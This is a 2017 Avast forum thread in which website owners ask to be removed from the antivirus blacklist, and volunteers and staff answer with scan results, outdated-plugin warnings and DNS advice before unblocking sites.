Steer away from afraid dot org and avast tean member may reconsider... http://toolbar.netcraft.com/site_report?url=+http%3A%2F%2Ffun4dog.ru%2F

Consider: http://www.domxssscanner.com/scan?url=http%3A%2F%2Ffun4dog.ru

polonus
Title: Re: How to remove my website from your blacklist?
Post by: polonus on May 16, 2017, 05:55:37 PM
Considering -http://fun4dog.ru/wa-content/js/jquery-plugins/jquery.retina.min.js?v1.7.1

Just some error in this code
Quote
found JavaScript
     error: undefined variable jQuery
     error: undefined variable c.fn
     error: line:1: SyntaxError: missing ; before statement:
          error: line:1: var c.fn = 1;
          error: line:1: ....^
There is availability in this code, but it may not be defined properly (pol) and issue with natroute?

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: karcsi1978 on May 16, 2017, 11:05:43 PM
Hi!

Please help for me.
My personal site [ kovacskaroly[.]hu/szakdolgozat ] is blacklisted by Avast.

I checked it the following tools:
https://www.virustotal.com/hu/url/4116de84dccf7a3203f1c94d19080ae0a9eb10b4960e10ed1e6627a2fdf3405e/analysis/1494967866/
http://zulu.zscaler.com/submission/show/53c8086da4cf249f15d0e970b945d810-1494967932
http://www.urlvoid.com/scan/kovacskaroly.hu/
https://sitecheck.sucuri.net/results/kovacskaroly.hu/szakdolgozat

I not see / not found any infections. But, I replaced all files with originals and replace database and login passwords.

Why this site appear in the black list?
Please help anyone to remove my site from the blacklist.
This site is very important for me, because I use this site for my DIPLOMA WORK!

Thank you!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 16, 2017, 11:09:37 PM
We, nor avast doe care what a site is used for.
For us it is about security.

Blacklisted :
https://www.virustotal.com/en/ip-address/91.82.117.199/information/
https://www.virustotal.com/en/file/77795c8a3c5a8ff8129cb4db828828c53a590f93583fcfb0b1112a4e670c97d4/analysis/
http://urlquery.net/report.php?id=1494967001776
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 17, 2017, 10:53:52 AM
Re fun4dog[.]ru - it is indeed because of DNS hijack. Change DNS hosting / use stealth (paid) account at afraid.org and get back to us for unblocking.
Re kovacskaroly[.]hu/szakdolgozat - Google (which means Chrome and Firefox) blocks it: https://www.google.com/transparencyreport/safebrowsing/diagnostic/index.html#url=kovacskaroly.hu/szakdolgozat
Title: Re: How to remove my website from your blacklist?
Post by: ss77892 on May 17, 2017, 07:05:09 PM
Re fun4dog[.]ru - it is indeed because of DNS hijack. Change DNS hosting / use stealth (paid) account at afraid.org and get back to us for unblocking.
Changed DNS :
Name servers listed at parent: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
Name servers listed at child: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
Title: Re: How to remove my website from your blacklist?
Post by: Mylan2 on May 18, 2017, 05:51:32 AM
Hello,
Please removed block my website
rynantech[.]com
rynantechnologies[.]com
rynansmartfertilizers[.]com
rynanagrifoods[.]com
Our website all clear on checked
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

Thanks,
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 18, 2017, 05:55:10 AM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Mylan2 on May 18, 2017, 06:00:00 AM
You can report a URL here: https://www.avast.com/report-a-url.php
Thank you swift response, the first time they had blocked my site, recently block again.  :'(
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on May 18, 2017, 06:18:37 AM
You're welcome.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 18, 2017, 09:05:05 AM
Re fun4dog[.]ru - it is indeed because of DNS hijack. Change DNS hosting / use stealth (paid) account at afraid.org and get back to us for unblocking.
Changed DNS :
Name servers listed at parent: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
Name servers listed at child: ns3-l2.nic.ru,ns4-cloud.nic.ru,ns4-l2.nic.ru,ns8-cloud.nic.ru,ns8-l2.nic.ru
I have removed fun4dog[.]ru from our blacklist ;)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 18, 2017, 09:07:18 AM
Please removed block my website
rynantech[.]com
rynantechnologies[.]com
rynansmartfertilizers[.]com
rynanagrifoods[.]com
I have removed rynantech[.]com from our blacklist. The other URLs were never blocked.
Title: Re: How to remove my website from your blacklist?
Post by: Mylan2 on May 18, 2017, 09:55:02 AM
Please removed block my website
rynantech[.]com
rynantechnologies[.]com
rynansmartfertilizers[.]com
rynanagrifoods[.]com
I have removed rynantech[.]com from our blacklist. The other URLs were never blocked.

Thank you HonzaZ  ;D
Title: Re: How to remove my website from your blacklist?
Post by: marsramirez on May 20, 2017, 02:31:18 AM
My customers that use a PC with Avast! Antivirus installed with Avast Online Security addon/extensions are experimenting problems while trying to access my website: boudikacomics[.]com

I've already ran the following tests for my website and everything looks fine:
https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com
http://freedns.afraid.org/

I've tested my site on a PC with Avast installed and the following error message appears:
t=27452 [st= 2]      DELEGATE_INFO  [dt=1]
 --> delegate_blocked_by = "extensión Avast Online Security"

I need you to remove my website from your blacklist as I'm losing a lot of potential customers.
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on May 20, 2017, 02:42:17 AM
I have removed boudikacomics[.]com from our blackilst ;)
Title: Re: How to remove my website from your blacklist?
Post by: marsramirez on May 20, 2017, 03:07:17 AM
I have removed boudikacomics[.]com from our blackilst ;)

Thanks a lot.
Title: Re: How to remove my website from your blacklist?
Post by: virosss on May 31, 2017, 05:29:51 AM
I have same problem. We buy new domain who its already in avast blacklist and recive alert message when trying to open it. Check the website with all possoble tools and the website its clean. Try to report for false positive, but no answer... and continue with alerts.

Anybody from Avast Team can help with this issue?

The domain its i-money(.)net(.)ua
Title: Re: How to remove my website from your blacklist?
Post by: bauerj on May 31, 2017, 09:09:23 AM
Hi, I have removed i-money(.)net(.)ua from our blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: virosss on May 31, 2017, 12:34:11 PM
Hi, I have removed i-money(.)net(.)ua from our blacklist.

Thanks ;)
Title: Re: How to remove my website from your blacklist?
Post by: tmjw321 on May 31, 2017, 10:23:49 PM
Hi.  I would like my website removed from your blacklist.  heyguyscomedy[.]com   
Not sure why it's blocking users from going there.  I ran several checks and verified it's clean using the following sites:

https://www.virustotal.com
http://zulu.zscaler.com
http://dnscheck.pingdom.com
http://www.siteadvisor.com

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on May 31, 2017, 10:37:30 PM
Blacklisted by McAfee :
http://www.siteadvisor.com/sites/heyguyscomedy.com
https://sitecheck.sucuri.net/results/heyguyscomedy.com

Blacklistings on that ASN :
http://urlquery.net/report.php?id=1496260482598

Two vulnerable libraries detected :
http://retire.insecurity.today/#!/scan/b9b92bbf825b807192446f2a36530c5de622c83b212216c35e3b25d049762f87
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 02, 2017, 09:25:12 AM
Blacklisted for spreading malware: heyguyscomedy[.]com/d4jnwkc6ue.php
Hopefully it has been cleaned already, so I am unblocking it ;)
Title: Re: How to remove my website from your blacklist?
Post by: Kelemen on June 13, 2017, 01:05:18 PM
Hi, it was recently brought to my attention that my site kel.mn is blocked by Avast, including all the possible subdomains.

I have checked the domain using all the available online tools which were unable to find any malicious files there.

Can my domain be removed from your blacklist please?

Thanks.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 13, 2017, 02:02:53 PM
You have some security issues with your CMS:
WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

email-subscribers 3.2.9   latest release (3.3) Update required
http://www.icegram.com/
contact-form-7 4.7   latest release (4.8) Update required
https://contactform7.com/
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

One jQuery library to be retired: http://retire.insecurity.today/#!/scan/fb2da25eae9ced5cfe5bbfb003dde551b1c6e3e311047136a01abb017fe07a1e

C+ status here: https://observatory.mozilla.org/analyze.html?host=kel.mn  see: recommendations.

DNS issues with CloudFlare: http://www.dnsinspect.com/kel.mn/10127457

Just wait for an Avast Team Member to come up with a verdict, and tell us why it has been blocked.
I think it is the use of problematic -zoho.mail, categorization vulnerabilities, but let's wait and see.

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: Kelemen on June 13, 2017, 02:10:36 PM
You have some security issues with your CMS:
WordPress Plugins
The following plugins were detected by reading the HTML source of the WordPress sites front page.

email-subscribers 3.2.9   latest release (3.3) Update required
http://www.icegram.com/
contact-form-7 4.7   latest release (4.8) Update required
https://contactform7.com/
Plugins are a source of many security vulnerabilities within WordPress installations, always keep them updated to the latest version available and check the developers plugin page for information about security related updates and fixes.

One jQuery library to be retired: http://retire.insecurity.today/#!/scan/fb2da25eae9ced5cfe5bbfb003dde551b1c6e3e311047136a01abb017fe07a1e

C+ status here: https://observatory.mozilla.org/analyze.html?host=kel.mn  see: recommendations.

DNS issues with CloudFlare: http://www.dnsinspect.com/kel.mn/10127457

Just wait for an Avast Team Member to come up with a verdict, and tell us why it has been blocked.
I think it is the use of problematic -zoho.mail, categorization vulnerabilities, but let's wait and see.

polonus (volunteer website security analyst and website error-hunter)

Hey, thanks for the detailed report!

I guess that it was blacklisted long time ago when I was using afraid.org DNS service, but let's wait and see.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 13, 2017, 02:52:42 PM
Ha die Kelemen,

Well the problem comes indeed with free afraid dot org service, when you never know your sub-domains are/stay really yours.
You have steered away from afraid dot org, you might be good to go.

Just pay attention to the recommendations to make the site a tiny bit more secure,
and wait for an Avast Team Member to come and unblock.

We here are just volunteers with relevant knowledge. Avast Team Members do the unblocking,
sometimes even as quick as with a next upcoming streaming update,

Groetjes,

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Milos on June 14, 2017, 10:56:07 AM
Hello,
domain "kel.mn" was unblocked yesterday 18:49 CET.

Milos
Title: Re: How to remove my website from your blacklist?
Post by: sagyaron on June 18, 2017, 09:48:56 PM
Hi Milos
My website is also block, sagiagency[.]com , i've change server and dns, I would be happy if you could please help me unblock the website.
thank you in advance.
Yaron
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 18, 2017, 10:07:16 PM
Blacklisted :
http://www.urlvoid.com/scan/sagiagency.com/
https://www.virustotal.com/en/url/ecd8d24caf74c1b4d8ee5accd64f25a678a4c21c008422a9a8cedf624c79cab3/analysis/1497815768/
https://www.virustotal.com/en/ip-address/185.37.151.213/information/
http://urlquery.net/report.php?id=1497813674834

Outdated software used :
https://sitecheck.sucuri.net/results/www.sagiagency.com

contact-form-7 4.6   latest release (4.8) Update required
Warning User Enumeration is possible
ID   User    Login
1   sagyaron   sagyaron
2   superuser   superuser

2 vulnerable libraries detected
http://retire.insecurity.today/#!/scan/ef13b8610a3f7934bb2b75e2a362ddafabc27ffbb4470434eb7822d90c8f0f25
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on June 18, 2017, 10:09:39 PM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 18, 2017, 10:30:38 PM
Hi Yaron, יום טוב

Adding to what Eddy so aptly reported,

It is not only avast that blocks, it is also blocked by Bitdefender's TrafficLight.

DNS issue: Name Servers Versions
WARNING: Name servers software versions are exposed:
188.166.127.243: "9.9.4-RedHat-9.9.4-29.el7_2.3"
212.129.26.2: "9.9.4-RedHat-9.9.4-29.el7_2.3"

Exposing name server's versions may be risky, when a new vulnerability is found your name servers may be automatically exploited by script kiddies until you patch the system. Take this up with the hoster of the name server(s).

Let's encrypt Authority X3 certificate is installed correctly, same origin aka sri-hashes also properly created.

What was flagged, the counter adware, has now not been detected, wait for an Avast Team Member to give the definite verdict.

We are just volunteers with relevant knowledge, but only Avast Team Members can unblock.
Wait until until  coming Monday, when one is to appear here.

polonus (volunteer website security analyst and website error-hunter)
כֹּל טוּב
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on June 19, 2017, 08:58:32 AM
I have removed sagiagency[.]com from our blacklist ;)!
Title: Re: How to remove my website from your blacklist?
Post by: D=a= on June 23, 2017, 12:41:36 PM
Hi there,

our website deigualaigual[.]net and its subdomains have passed the tests of urlvoid, pingdom, virustotal, with the result that the web and its subdomines are clean, so we need  it to be removed from the blacklist of avast. Thanks.

Regards.
Title: Re: How to remove my website from your blacklist?
Post by: Pondus on June 23, 2017, 12:48:36 PM
Hi there,

our website deigualaigual[.]net and its subdomains have passed the tests of urlvoid, pingdom, virustotal, with the result that the web and its subdomines are clean, so we need  it to be removed from the blacklist of avast. Thanks.

Regards.
probably because you are using afraid.org free host
Nameservers: ns2.afraid.org, ns3.afraid.org, ns4.afraid.org, ns1.afraid.org


Title: Re: How to remove my website from your blacklist?
Post by: Asyn on June 23, 2017, 12:50:57 PM
Also see: http://zulu.zscaler.com/submission/show/4a3498bcb2f07a658bf777af210ab50e-1498214777
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on June 23, 2017, 12:58:18 PM
VirusTotal does not scan websites.

You are linking to a blacklisted website.
You are using afraid.org as nameserver.
https://forum.avast.com/?topic=148018.msg1075293#msg1075293

Wordpress issue :
Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User    Login
1   None   jomra
2   None   ruben-i-kotler

Vulnerable libraries that need to be retired :
http://retire.insecurity.today/#!/scan/eee01fc5ba9f903547544199bf66601c40a4bd50c299721d49984a7accdb27f4
http://zulu.zscaler.com/submission/show/4a3498bcb2f07a658bf777af210ab50e-1498214764
Title: Re: How to remove my website from your blacklist?
Post by: polonus on June 23, 2017, 04:29:12 PM
Using a free afraid dot org account means a clear security risk as you will not know who is the owner of your sub-domain(s)?
That is the risk.

For the script risks given by zulu.zsclaer scan result flagged, see: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fwww.deigualaigual.net%2Fwp-includes%2Fjs%2Fjquery%2Fjquery.js%3Fver%3D1.12.4
with errors:
Quote
error: line:5: SyntaxError: missing ) in parenthetical:
          error: line:5: .events)n.removeEvent(b,d,e.handle);b.removeAttribute(n.expando)}"script"===c&&b.text!==a.text?(Da(b).text=a.text,Ea(b)):"object"===c?(b.parentNode&&(b.outerHTML=a.outerHTML),l.html5Clone&&a.innerHTML&amp;&!n.trim(b.innerHTML)&&(b.innerHTML=a.innerHTML)):
          error: line:5:
means the output of the server is invalid, post action not well formed.
Yep, da old javascript it could often be a bitch!
Blocked for me by uMatrix external script, see: https://urlscan.io/result/cd26875b-61df-4fcf-a304-fc6ce2f023d3#summary
Also see api-scan for external script: https://urlscan.io/api/v1/result/cd26875b-61df-4fcf-a304-fc6ce2f023d3/

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: miroslav.braikov on July 16, 2017, 11:16:46 PM
hxxp://vic[.]bg is reported as infected, but it is not
i've checked it with
https://sitecheck.sucuri.net/results/vic.bg/

what i have to do in order to be removed of your blacklist?
Title: Re: How to remove my website from your blacklist?
Post by: polonus on July 17, 2017, 12:02:33 AM
Hi miroslav.braikov,

Wait for an avast team member to give the final verdict and eventually unblock.
We are volunteers with relevant knowledge but cannot unblock as that is for avast team members.

Still the security of your website could be somewhat improved.
Re: http://www.dnsinspect.com/vic.bg/10155323  (stealthed name servers and Found mail servers with inconsistent reverse DNS entries). 
Re: https://aw-snap.info/file-viewer/?protocol=not-secure&tgt=vic.bg%2F&ref_sel=GSP2&ua_sel=ff&fs=1   seems OK.
Server maybe Mute Remote vulnerable.
Vulnerable bootstrap library to be retired: http://retire.insecurity.today/#!/scan/e610cc95b2d8cce37b099473066cbad28eba676d4bdc100863126752c60f1f0e
F-status and see recommendations: https://observatory.mozilla.org/analyze.html?host=vic.bg

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 18, 2017, 10:23:56 AM
Hi,
There was a false positive on a favicon.ico file (hxxp://vic[.]bg/imgs/vicBG.ico)... I have disabled the detection, it should be okay in the next VPS, but you might want to remove the .ico file to be able to access it before the update rolls out ;)
Title: Re: How to remove my website from your blacklist?
Post by: glauciojcmachado on July 31, 2017, 02:16:57 AM
Também estou com este problema. Meu site não tem nada de errado com ele, mas todos os usuários avast reclamam. Como podem retirar da lista negra?
I'm also having this problem. My site has nothing wrong with it, but all avast users complain. How can they be blacklisted?
https://www.gravityscan.com/verify/c49dbb2d2e31f4a2fd732050addb2af599494b1383a97a2eaee2a8a28629ebda
https://www.google.com/transparencyreport/safebrowsing/diagnostic/?hl=pt-BR#url=universodovinil.com.br
Agradeço a atenção
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on July 31, 2017, 04:59:42 AM
-> https://sitecheck.sucuri.net/results/universodovinil.com.br
-> http://zulu.zscaler.com/submission/show/b3b6c1cc51286a8de461c18096f06088-1501469570
Title: Re: How to remove my website from your blacklist?
Post by: HonzaZ on July 31, 2017, 09:02:55 AM
universodovinil[.]com.br was blocked because it was a router CSRF source. I am now unblocking the domain, but note that it will be automatically blocked again if there is another attack from it.
Title: Re: How to remove my website from your blacklist?
Post by: Michał89 on August 30, 2017, 11:03:13 AM
Hi

My all malicious links has been removed from http://maricom[.]pl and Wordpress has been reinstaled and updated. Can you remove my site from your blacklist.
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 30, 2017, 12:32:30 PM
You can report a URL here: https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 30, 2017, 01:53:45 PM
http://retire.insecurity.today/#!/scan/0cbca75fe4cf585d00203d22f34392cff8ac394a581a73aa19c5f0ef05cdfd73
Title: Re: How to remove my website from your blacklist?
Post by: Michał89 on August 30, 2017, 03:20:29 PM
jquery also updated:)

http://retire.insecurity.today/#!/scan/1ae88029b30b0f35317ceb553870172a38e5b0926e47145cbbaef8454a1374f9
Title: Re: How to remove my website from your blacklist?
Post by: Stareclipse on August 30, 2017, 09:35:10 PM
Hello, our website Asrcargo.ru is blocked again, despite it has been broken only once in 2016. Since that time the site was blocked by Avast several times without any reasons, so I write messages every month or two.

The site is absolutely clean, confirmed by Google Search Console, access is under 2 factor authentication, no any malware, scripts or viruses detected. Please check and delete our domain from your database.
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on August 30, 2017, 09:45:50 PM

Report a URL
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: Stareclipse on August 30, 2017, 10:00:29 PM
Many thanks!! I searched this page for so a long time!


Report a URL
https://www.avast.com/report-a-url.php
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on August 30, 2017, 10:20:32 PM
You're welcome. :)
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 30, 2017, 10:31:10 PM
The IP your site is on delivers/-ed/has launched ransomeware: https://ransomwaretracker.abuse.ch/ip/95.213.196.126/
and the abuse was performed from that domain. Mac Afee also blocks your site, so it is not only avast....

See the anomalities in the response http://www.rexswain.com/cgi-bin/httpview.cgi?url=http://asrcargo.ru&uag=Mozilla/5.0+(Windows+NT+6.3%3B+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36&ref=http://www.rexswain.com/httpview.html&aen=&req=GET&ver=1.1&fmt=AUTO
-> https://github.com/xDrivenDevelopment/v8Reader/commit/955c22d5522b37c982d4212fe04da5c153e45eed.patch
- http://toolbar.netcraft.com/site_report?url=http://s12.default-host.net
Quote
Сайт s12.default-host.net не настроен на сервере

Сайт s12.default-host.net не настроен на сервере хостинга.

Адресная запись домена ссылается на наш сервер, но этот сайт не обслуживается.
Если Вы недавно добавили сайт в панель управления - подождите 15 минут и ваш сайт начнет работать.

Server s12
Quote
The site s12.default-host.net is not configured on the server

The site s12.default-host.net is not configured on the hosting server.

The domain address is linked to our server, but this site is not served.
If you recently added a site to the control panel - wait 15 minutes and your site will start working.

Server s12

When youre site/the server it is on, is no longer being misused/abused,
wait for an avst team member to give a final verdict, and eventually unblock or continue to block...

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: bob3160 on August 30, 2017, 10:46:07 PM
The IP your site is on delivers/-ed/has launched ransomeware: https://ransomwaretracker.abuse.ch/ip/95.213.196.126/ (https://ransomwaretracker.abuse.ch/ip/95.213.196.126/)
and the abuse was performed from that domain. Mac Afee also blocks your site, so it is not only avast....

See the anomalities in the response http://www.rexswain.com/cgi-bin/httpview.cgi?url=http://asrcargo.ru&uag=Mozilla/5.0+(Windows+NT+6.3%3B+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36&ref=http://www.rexswain.com/httpview.html&aen=&req=GET&ver=1.1&fmt=AUTO (http://www.rexswain.com/cgi-bin/httpview.cgi?url=http://asrcargo.ru&uag=Mozilla/5.0+(Windows+NT+6.3%3B+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/60.0.3112.113+Safari/537.36&ref=http://www.rexswain.com/httpview.html&aen=&req=GET&ver=1.1&fmt=AUTO)
-> https://github.com/xDrivenDevelopment/v8Reader/commit/955c22d5522b37c982d4212fe04da5c153e45eed.patch (https://github.com/xDrivenDevelopment/v8Reader/commit/955c22d5522b37c982d4212fe04da5c153e45eed.patch)
- http://toolbar.netcraft.com/site_report?url=http://s12.default-host.net (http://toolbar.netcraft.com/site_report?url=http://s12.default-host.net)
Quote
Сайт s12.default-host.net не настроен на сервере

Сайт s12.default-host.net не настроен на сервере хостинга.

Адресная запись домена ссылается на наш сервер, но этот сайт не обслуживается.
Если Вы недавно добавили сайт в панель управления - подождите 15 минут и ваш сайт начнет работать.

Server s12
Quote
The site s12.default-host.net is not configured on the server

The site s12.default-host.net is not configured on the hosting server.

The domain address is linked to our server, but this site is not served.
If you recently added a site to the control panel - wait 15 minutes and your site will start working.

Server s12

When youre site/the server it is on, is no longer being misused/abused,
wait for an avst team member to give a final verdict, and eventually unblock or continue to block...

polonus (volunteer website security analyst and website error-hunter)
Precisely why I passed along the link so that once the site is reported to Avast, they will make the final decision.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 30, 2017, 11:31:39 PM
Rightly so, and I hope an avast team member will come here and tell whether the site is fit for unblocking.
Also the site owner has to address McAfee as it has been blocked there as well.
Whenever the locky ransomeware delivering (6 times reported during the previous year) was accidental
and beyond the capability of site-owner and domain hoster alike should also be taken into consideration.

At least these external elements have been found to be benign:
External Elements

URL   RISK
-http://asrholdings.com.hk/freight-forwarding-   Benign
-http://tutmee.ru   Benign
-http://www.carlsberg.com   Benign
-http://asrholdings.com.hk/general-sales-agent   Benign
-http://www.hkex.com.hk/eng/market/partcir/seh   Benign

But the site is still being blacklisted on mnemonic secure dnshere verified 2017-08-30:
https://urlquery.net/report/40141bdc-3ba7-4af1-9da1-c2d06c7945d2

See issues here: https://threatintelligenceplatform.com/report/asrcargo.ru/uGmw6qL5wm
Also blacklisted by Virus Total suspicious URLs analyser   Failed   Status: dangerous
BitDefender - malware site
Trustwave - malicious site
ESET - malware site
AutoShun - malicious site

polonus
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 31, 2017, 01:00:27 PM
Quote
Since that time the site was blocked by Avast several times without any reasons
Stareclipse, get the clue.
avast doesn't block sites/servers/IP's without  a reason.
And if you look at the reports from Polonus, you will see it is a legitimate block and it will stay (or get blocked again) if the owner doesn't improve the security and keep spreading Locky.

Get dedicated hosting at a trusted hoster that does take security seriously.
Title: Re: How to remove my website from your blacklist?
Post by: cdnsupport on August 31, 2017, 01:31:21 PM
Hi,

I am the support manager from holacdn.com, one of our urls have been blocked by you, can you please remove it:
http://cdn.worldnewsfeed.org/uiadfix.js

I checked the following sites:
https://www.virustotal.com/#/url/03230211cbb4e786082b3a107b2a3db52abc16ad75c6ccc4f10bbb02619ab1c4/detection
https://zulu.zscaler.com/submission/ba98be06-836b-4c44-adba-56448602813f
https://tools.pingdom.com/#!/iC1nQ/http://cdn.worldnewsfeed.org/uiadfix.js

all with no risks or with response code 200 OK
Title: Re: How to remove my website from your blacklist?
Post by: Asyn on August 31, 2017, 01:34:40 PM
Website:    cdn.worldnewsfeed.org/uiadfix.js
Status:    Unable to properly scan your site. Content not found.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on August 31, 2017, 01:38:28 PM
Why giving a link to a javascript and not just the domain ?
Site is having issues, avast is not blocking it.
Contact the admin and set him/her to work.

Edit:
according to the domain registration, it looks like worldnewsfeed isn't even owned by holaspark.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on August 31, 2017, 02:02:32 PM
Even with an external scan at https://aw-snap.info/file-viewer/
avast webshield flags an alert for JS?Agent-DEZ detection, probably a heritage from AVG's:
http://www.avgthreatlabs.com/en-ww/virus-and-malware-information/info/js-agent/

Consider: http://www.domxssscanner.com/scan?url=http%3A%2F%2Fcdn.worldnewsfeed.org%2Fuiadfix.js

You failed the lame nameserver check  8) -> toolbar.netcraft.com/site_report?url=http://ns-849.awsdns-42.net (10 red out of 10).

With a javascript unpacker check I get suspicious behavior:
Quote
All Malicious or Suspicious Elements of Submission

suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
-cdn.worldnewsfeed.org/uiadfix.js benign
[nothing detected] -cdn.worldnewsfeed.org/uiadfix.js
     status: (referer=hxtp:/www.ask.com/web?q=puppies)saved 1345218 bytes e5e1ed0ed3bd9e64cc865b605693044e77626fc4
     info: [decodingLevel=0] found JavaScript
     suspicious: maxruntime exceeded 10 seconds (incomplete) 0 bytes
     file: e5e1ed0ed3bd9e64cc865b605693044e77626fc4: 1345218 bytes
     file: 5adcc5c1c33a385e26478e6a9e3a11b4b0d32267: 1345436 bytes
     file: 2b56904e698433c1650a8e460f0cc7ae654c2a5f: 1345442 bytes
     file: 311f73081506339fa3ef328f7aaa3ccf57fbe3d3: 1345651 bytes
     file: ac752db2251a8125a3c169614d0aa6ffa5536e0d: 1345843 bytes
     file: be701fb6acd08d5943a30eefaab4813cca4d3a46: 1345557 bytes
     file: db7de399e2936a54af4098051f0f97fbbd49a76c: 1345681 bytes

Whatever it may be, final verdict will come from aan avast team member as we here are just volunteers with relevant knowledge, but cannot unblock, remember the IP has been reported to several sources as previously malicious: https://otx.alienvault.com/indicator/ip/205.185.216.10 and for various abuse just as recently as a week ago, see here:
https://www.abuseipdb.com/check/205.185.216.10  (abused, misused server at amazon - IDS alerts for a.o. ET INFO EXE IsDebuggerPresent (Used in Malware Anti-Debugging) (release dot xender dot com and others that share that same IP...)

F-Grade status and recommendations: https://observatory.mozilla.org/analyze.html?host=cdn.worldnewsfeed.org

polonus (volunteer website security analyst and website error-hunter)
Title: Re: How to remove my website from your blacklist?
Post by: rohmanhm on September 11, 2017, 04:53:26 AM
I just opened a ticket. https://support.avast.com/support/tickets/948938

Please release my site (news-health.net) from your blacklist. I just owned this domain.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 11, 2017, 05:41:21 AM
https://urlquery.net/report/a02a17ab-c905-42fc-bc9a-eef59212793b
https://sitecheck.sucuri.net/results/news-health.net

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1   rmasy   rmasy
2              None

Warning Directory Indexing Enabled

http://retire.insecurity.today/#!/scan/df99ab820036f40d8ebf8792ac302c85cc93b03dbd17c080dd1d32ea759e1a75
Title: Re: How to remove my website from your blacklist?
Post by: rohmanhm on September 11, 2017, 08:50:59 AM
https://urlquery.net/report/a02a17ab-c905-42fc-bc9a-eef59212793b
https://sitecheck.sucuri.net/results/news-health.net

Warning User Enumeration is possible
The first two user ID's were tested to determine if user enumeration is possible.
ID   User            Login
1   rmasy   rmasy
2              None

Warning Directory Indexing Enabled

http://retire.insecurity.today/#!/scan/df99ab820036f40d8ebf8792ac302c85cc93b03dbd17c080dd1d32ea759e1a75

I just installed wordpress cms. Should I remove wordpress to get my site safe?
Any advice?

I still don't have any idea why my site is blocklisted by Avast.
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 11, 2017, 08:53:27 AM
If you have to ask if you should remove Wordpress to make the site safer, you shouldn't be running a website at all or hire a real admin who know what he/she is doing.
Title: Re: How to remove my website from your blacklist?
Post by: LukasJ on September 11, 2017, 09:07:06 AM
Hi guys,
URL news-health.net has been removed from blacklist.

Lukáš
Title: Re: How to remove my website from your blacklist?
Post by: rohmanhm on September 11, 2017, 09:28:40 AM
Hi guys,
URL news-health.net has been removed from blacklist.

Lukáš

Thank's Lucas. Now I can focus to my content
Title: Re: How to remove my website from your blacklist?
Post by: Subi on September 11, 2017, 02:14:48 PM
Hello Eddy,

Could you help me, my server 213.181.208.128 is full of wp sites, all of them blocked by Avast, becouse: URL:MAL

I made an IP check:
https://www.virustotal.com/en/ip-address/213.181.208.128/information/

If I check only one site (4example), it says its clean:
https://sitecheck.sucuri.net/results/femesfafehergyarmat.hu

what is the problem with my server?

thx!
Title: Re: How to remove my website from your blacklist?
Post by: Eddy on September 11, 2017, 04:53:43 PM
Subi,

without looking any further, I already see that your problem is the use of shared hosting.
Step away from it and get dedicated hosting.
Title: Re: How to remove my website from your blacklist?
Post by: polonus on September 11, 2017, 09:54:56 PM
IP blacklisted by -213.181.208.128 blacklisted by 2 websites
1 Von Hamburg bis Hawaii
2 CH3man's Web

